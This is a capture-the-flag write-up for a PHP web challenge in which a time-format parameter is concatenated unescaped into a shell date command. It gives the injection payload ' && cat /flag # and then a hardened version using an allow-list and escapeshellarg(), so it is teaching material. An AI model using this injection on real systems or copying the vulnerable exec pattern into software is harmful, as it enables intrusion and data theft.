If we click on what's the date/time we get it, so it's time to analyze the source code:

If we analyze the Dockerfile, it seems that the flag is being copied to /flag:

If we inspect the controllers folder, we find TimeController.php:

<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
} 

This controller calls a model inside the models subfolder, so let's inspect TimeModel.php:

<?php
class TimeModel
{
    public function __construct($format)
    {
        // $format comes straight from $_GET['format'] and is concatenated unescaped.
        $this->command = "date '+" . $format . "' 2>&1";
    }
 
    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}

We can escape the command built in the constructor by appending ' #: the quote closes the single-quoted format string and the # comments out the rest of the line. So we can read the content of /flag by altering the request with Burp, using the payload (URL-encoded): ' && cat /flag #
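The fix for this bug, as an added example that is not part of the challenge source: a hardened model that validates the format against an allow-list and passes it to date as a single quoted argument. The class name SafeTimeModel, the getCommand() helper and the allow-list pattern are assumptions made for illustration.

```php
<?php
// Added example, not part of the challenge source: a hardened TimeModel.
class SafeTimeModel
{
    // Assumption: only strftime-style directives and simple separators are needed.
    private const FORMAT_PATTERN = '/\A[A-Za-z0-9%:\/., _-]{1,64}\z/';

    private string $command;

    public function __construct(string $format)
    {
        // Reject anything outside the allow-list (quotes, &, ;, #, $, backticks...).
        if (!preg_match(self::FORMAT_PATTERN, $format)) {
            throw new InvalidArgumentException('Unsupported date format');
        }
        // On Linux, escapeshellarg() wraps the value in single quotes and escapes
        // embedded quotes, so the format reaches date(1) as one argument.
        $this->command = 'date ' . escapeshellarg('+' . $format) . ' 2>&1';
    }

    // Hypothetical helper, used here only to show the command that would run.
    public function getCommand(): string
    {
        return $this->command;
    }

    public function getTime(): string
    {
        $time = exec($this->command);
        return ($time !== false && $time !== '') ? $time : '?';
    }
}

// Constructed inputs: the default format and the payload quoted in this write-up.
foreach (['%H:%M:%S', "' && cat /flag #"] as $format) {
    // The string the original constructor builds (printed only, never executed).
    echo "original: date '+" . $format . "' 2>&1", PHP_EOL;
    try {
        $model = new SafeTimeModel($format);
        echo 'hardened: ', $model->getCommand(), ' => ', $model->getTime(), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'hardened: rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

The allow-list alone already stops the payload; escapeshellarg() is kept as a second layer in case the pattern is later loosened.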